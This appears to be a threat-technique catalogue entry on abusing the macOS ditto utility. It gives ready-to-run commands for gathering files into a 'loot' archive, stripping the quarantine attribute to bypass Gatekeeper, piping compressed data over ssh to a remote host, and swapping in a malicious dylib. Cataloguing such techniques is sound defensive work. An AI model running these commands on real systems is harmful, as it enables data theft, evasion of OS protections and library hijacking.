ditto
Created by Brendan Chamberlain (@infosecB)
Description
ditto is a command line utility that is commonly used to copy files and directories while preserving file attributes and permissions. The tool can be used by malicious actors to collect and exfiltrate sensitive data, move laterally, and/or perform DLL hijacking or binary replacement attacks.
| Created | Tactics | Tags |
|---|---|---|
| 2023-05-04 | Collection Exfiltration Lateral Movement Defense Evasion Persistence | files compress recursive |
Paths
/usr/bin/ditto
Use Cases
Copy and compress sensitive data locally
The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.
ditto -c -k --sequesterRsrc --keepParent /home/user/sensitive-files /tmp/l00t.zip
Remove extended attributes from a file
ditto can be used to bypass Gatekeeper by removing the “com.apple.quarantine” extended attribute.
ditto -c -k unsigned.app app.zip ditto -x -k app.zip unsigned.app 2>/dev/null
Copy, compress, and transfer sensitive data to a remote macOS host
The following command gathers and compresses (-c) files from the specified folder and writes them to a zip (-k) file.
ditto -c --norsrc /home/user/sensitive-files - | ssh remote_host ditto -x --norsrc - /home/user/l00t
DLL hjiacking
Replace a legitimate library with a malicious one while maintaining the original file permissions and attributes.
ditto -V /path/to/malicious-library/malicious_library.dylib /path/to/target-library/original_library.dylib
Detections
- No detection content at time of writing